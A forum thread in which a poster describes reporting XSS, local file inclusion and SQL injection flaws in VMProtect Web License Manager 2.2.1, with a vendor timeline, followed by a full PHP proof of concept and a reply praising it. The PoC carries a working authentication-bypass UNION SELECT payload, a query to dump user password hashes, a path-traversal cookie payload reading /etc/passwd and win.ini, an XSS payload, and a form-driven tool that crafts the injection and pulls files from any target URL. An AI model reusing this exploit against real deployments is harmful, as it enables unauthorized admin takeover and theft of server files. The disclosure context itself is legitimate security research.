Jump to content
Tuts 4 You

VMProtect Web License Manager and code vulnerabilities


Recommended Posts

Posted

Hey guys,

Maybe some of you know "VMProtect Web License Manager" it's a Web application made by VMProtect to manage licenses and stuff.

I've gived a try into WebLM by chance (i've found a malicious software who was using VMP License Manager, and that how i started to be interested into hacking the web application of VMP)

At first i've found an XSS (Cross Site Scripting) and a LFI (Local File Include) vulnerability.

One day after, i reported the bug via the website of vmpsoft.com and i got a fast answer from the vmp support.

On my second mail i've even attached the content of their etc/passwd as proof that it's a 'serious' problem.

And i don't know what they have do but they spend almost 2 months for fixing a simple XSS and LFI, picture below i'm not joking:

jt823pG.png

After that they fixed these two things, i got the opportunity to go more deeper in my analysis.

They offered me a copy of their product in order to debug the web application.

This time with the PHP code in hands, i've found a critical SQL injection leading to an authentication bypass (anyone can be admin on the panel and manage licenses)

I've sent them a detailed report about this flaw and... once again i'm not joking the VMP support asked me 'how to fix it?'

ut8gU6E.png

They fixed it themself finally.

VMProtect is a good product i've nothing to add on this, but their web application and their lack of knowledge...

Especially these guys, they do security products, they should know those things.

below is my proof of concept:

<?php/**VMProtect Web License Manager 2.2.1-----------------------------------		Vendor site: http://vmpsoft.com/		First contact............: 11/09/2013		Vendor answer............: 12/09/2013		Vendor fixed the LFI/XSS.: 08/11/2013		Second contact for SQL...: 25/11/2013		Vendor fixed the SQL.....: 30/11/2013		PoC Public release.......: 12/12/2013	File	----		./inc/dbopen.inc.php		What's wrong?	-------------		This function file works with MySQL databases.		A function named 'Sql' (line 13) sanitize an input passed in argument.		Line 21, a regular expression extract a substring if 'exp:' is present.		If yes, it return it without any further checks.		If not, it clear the input with 'mysql_real_escape_string'.		So, every input cleared with 'Sql' is vulnerable to SQL Injection attacks.		File	----		./login.php		What's wrong?	-------------		Since dbopen.inc.php's function 'Sql' is vulnerable...				$sql = "SELECT * FROM {$DB_PREFIX}users WHERE login=" . Sql($_POST["login"]);				Yup! This is really good. From this, we can do a lot of things, like get the		password of an user, or get authenticated as an unregistred user.		We will authenticated as anyone with an 'UNION SELECT' query.		The 'password' field of 'users' database is a SHA-1 hash of the password.				The query would like this...				=> SELECT * FROM vmp_users WHERE login=NULL UNION SELECT 1, 2, 3, 4, 5, 6				1 => id		2 => login		3 => SHA1(password)		4 => email		5 => isadmin  (1 for admin, 0 for manager)		6 => failures (anti password bruteforcing)				To inject this query, just use the trick saw before:				=> exp:NULL UNION SELECT 1, 2, 3, 4, 5, 6				Fill each inputs with correct values, and get authenticated!				Example for:			id       => 1337			login    => f4g			password => f4g			email    => f4g@tapz.eu			isadmin  => 1			failures => 0				Login    => exp:NULL UNION SELECT 1337, 0x663467, SHA1(0x663467), 0x663467407461707a2e6575, 1, 0		Password => f4g				You can also know the hashed password of an user:				exp:NULL UNION SELECT 1337, login, SHA1(0x663467), password, 5, 6 FROM vmp_users LIMIT 0, 1				The username of the (fake) user is the user's name and the mail is the password...		You can see it in the top-right corner.		This vulnerability was found by having the source code.		The demo panel on the official site was also vulnerable.	File	----		./index.php		What's wrong?	-------------		The cookie 'lang' isn't correctly sanitised and lead to Remote file include attacks		Cookie input lang was set to ../../../../../../../../../../etc/passwd%00		File contents found: root:x:0:0:root:/root:/bin/bash		This vulnerability was found without having the source code but was tested on many panels.		The demo panel on the official site was also vulnerable.	File	----		./offline.php		What's wrong?	-------------		Imput 'url' isn't correctly sanitised and lead to Cross-site scripting attacks:		Payload: </textarea><script>prompt(1337)</script>		This vulnerability was found without having the source code but was tested on many panels.		The demo panel on the official site was also vulnerable.	Solution	--------		Upgrade to newest version.	Thanks	------		VMProtect team, Xartrick		*/?><style>	label {		display: block;		width:   100px;		float:   left;	}</style><form method="POST">	<label for="id">Id:</label>             <input name="id"       id="id"       type="number"   value="1337" />       <br />	<label for="login">Login:</label>       <input name="login"    id="login"    type="textbox"  value="f4g" />        <br />	<label for="password">Password:</label> <input name="password" id="password" type="password" value="f4g" />        <br />	<label for="email">Email:</label>       <input name="email"    id="email"    type="email"    value="f4g@tapz.eu" /><br />	<label for="isadmin">Admin:</label>     <input name="isadmin"  id="isadmin"  type="checkbox" checked="true" />     <br />	                                        <input type="submit" value="Send" /></form><form method="POST">	<label for="website">Website:</label> <input name="website" id="website" type="textbox" value="" />                          <br />	<label for="file">File:</label>       <input name="file"    id="file"    type="textbox" value="../../../../../../../../../../windows/win.ini" /><br />	                                      <input type="submit" value="Get" /></form> <?php	$input_user = array('id', 'login', 'password', 'email');	$input_file = array('website', 'file');		if (checkInput($input_user)) {		$id       = intval($_POST['id']);		$login    = $_POST['login'];		$password = $_POST['password'];		$email    = $_POST['email'];		$isAdmin  = isset($_POST['isadmin']);				$query  = 'exp:NULL UNION SELECT ';		$query .= $id                                 . ', ';  // id		$query .= '0x' . stringToHex($login)          . ', ';  // login		$query .= 'SHA1(0x' . stringToHex($password)  . '), '; // password		$query .= '0x' . stringToHex($email)          . ', ';  // email		$query .= (($isAdmin) ? '1' : '0')            . ', ';  // isadmin		$query .= '0';                                         // failures?><br /><form>	<label for="login">Login:</label>       <input name="login"    type="textbox" value="<?php echo($query); ?>" /><br />	<label for="password">Password:</label> <input name="password" type="textbox" value="<?php echo(htmlentities($password, ENT_QUOTES)); ?>" /></form><?php	}		if (checkInput($input_file)) {		if (filter_var($_POST['website'], FILTER_VALIDATE_URL)) {			$curl = curl_init($_POST['website'] . 'include/lang.inc.php');						curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);			curl_setopt($curl, CURLOPT_HEADER, false);			curl_setopt($curl, CURLOPT_COOKIE, 'lang=' . urlencode($_POST['file'] . chr(0)) . ';');						$page = curl_exec($curl);?><textarea rows="20" cols="100" disabled="disabled" wrap="off"><?php echo($page); ?></textarea><?php					}	}		function stringToHex($str) {		$hex = null;				for ($i = 0; $i < strlen($str); $i++)			$hex .= str_pad(dechex(ord($str[$i])), 2, '0', STR_PAD_LEFT);				return $hex;	}		function checkInput($inputs) {		global $_POST;				foreach ($inputs as $input) {			if (!isset($_POST[$input]))				return false;						if (is_array($_POST[$input]))				return false;						if ($_POST[$input] == '')				return false;		}				return true;	}?>
And a short video of the Auth bypass: http://www.youtube.com/watch?v=da_RIC5EmaA

what's do you think guys ?

This is the most awkward conversation that i got with a security vendor since a long time.

  • Like 6
  • 2 weeks later...
Posted (edited)

Very neat stuff that SQL injection, kinda glad you did this post because I've been really wanting to learn it....

As far as helping security corporations with their software, it's a weird thing... You're not usually getting paid and they are but you're the one breaking their software for good reasons and letting them know about it

Sometimes, most of the time we (security risk hackers) get used... But here they seem to want your help

They gave you free copies of their software and that's cool

Ask yourself what your seeking in all of this:

Fame

Fortune

A name for yourself

Respect

Or is it knowledge? And the knowledge is what it's all about, I'm not here to play guidance counselor just saying... Can't wait to watch your video and learn a lil SQL injection

Thnx

PS: probably took them 2 months because A) they probably only have like 4 peopleback there fixing it whereas MCSFT has a ton of people and makes a billion a year

B) they trusted you not to go open source with that 0-day and had you they probably would have rushed around

C) Company size is an important part of all business

Edited by JMC31337

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...